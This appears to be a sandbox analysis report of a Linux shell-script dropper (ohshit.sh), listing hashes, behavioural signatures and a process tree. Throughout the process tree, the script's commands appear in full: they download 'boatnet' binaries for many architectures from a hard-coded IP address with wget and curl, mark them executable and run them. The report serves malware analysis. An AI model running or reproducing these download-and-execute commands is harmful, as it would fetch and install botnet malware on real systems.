Analysis
-
max time kernel
3s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
23-12-2024 05:02
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
ohshit.sh
-
Size
3KB
-
MD5
e0ccd217979419469e913cbef10872f3
-
SHA1
6bbef022dcf450af81bee90522e4c82069c84064
-
SHA256
288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71
-
SHA512
38402719e384396071ab1f779eb0d67a55570ecfb04018e47cafdfd73ce04984e15c0d2942b446cee5652a449e22a8690812dbe5fd232736cb8a3939531255ce
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1543 chmod 1561 chmod 1579 chmod 1513 chmod 1531 chmod 1537 chmod 1555 chmod 1585 chmod 1501 chmod 1507 chmod 1525 chmod 1573 chmod 1519 chmod 1549 chmod 1567 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 1502 WTF /tmp/WTF 1508 WTF /tmp/WTF 1514 WTF /tmp/WTF 1520 WTF /tmp/WTF 1526 WTF /tmp/WTF 1532 WTF /tmp/WTF 1538 WTF /tmp/WTF 1544 WTF /tmp/WTF 1550 WTF /tmp/WTF 1556 WTF /tmp/WTF 1562 WTF /tmp/WTF 1568 WTF /tmp/WTF 1574 WTF /tmp/WTF 1580 WTF /tmp/WTF 1586 WTF -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1504 wget 1505 curl 1506 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/WTF ohshit.sh
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:1493 -
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.x862⤵PID:1494
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.x862⤵PID:1496
-
-
/bin/catcat boatnet.x862⤵PID:1500
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1501
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1502
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
PID:1504
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
PID:1505
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:1506
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1508
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arc2⤵PID:1510
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arc2⤵PID:1511
-
-
/bin/catcat boatnet.arc2⤵PID:1512
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1514
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.i4682⤵PID:1516
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.i4682⤵PID:1517
-
-
/bin/catcat boatnet.i4682⤵PID:1518
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1520
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.i6862⤵PID:1522
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.i6862⤵PID:1523
-
-
/bin/catcat boatnet.i6862⤵PID:1524
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1526
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.x86_642⤵PID:1528
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86_642⤵PID:1529
-
-
/bin/catcat boatnet.x86_642⤵PID:1530
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1532
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.mpsl2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.mpsl2⤵PID:1535
-
-
/bin/catcat boatnet.mpsl2⤵PID:1536
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1538
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm2⤵PID:1541
-
-
/bin/catcat boatnet.arm2⤵PID:1542
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1544
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm52⤵PID:1546
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm52⤵PID:1547
-
-
/bin/catcat boatnet.arm52⤵PID:1548
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1550
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm62⤵PID:1552
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm62⤵PID:1553
-
-
/bin/catcat boatnet.arm62⤵PID:1554
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1556
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm72⤵PID:1558
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm72⤵PID:1559
-
-
/bin/catcat boatnet.arm72⤵PID:1560
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1562
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.ppc2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.ppc2⤵PID:1565
-
-
/bin/catcat boatnet.ppc2⤵PID:1566
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1568
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.spc2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.spc2⤵PID:1571
-
-
/bin/catcat boatnet.spc2⤵PID:1572
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1574
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.m68k2⤵PID:1576
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.m68k2⤵PID:1577
-
-
/bin/catcat boatnet.m68k2⤵PID:1578
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1580
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.sh42⤵PID:1582
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.sh42⤵PID:1583
-
-
/bin/catcat boatnet.sh42⤵PID:1584
-
-
/bin/chmodchmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:1586
-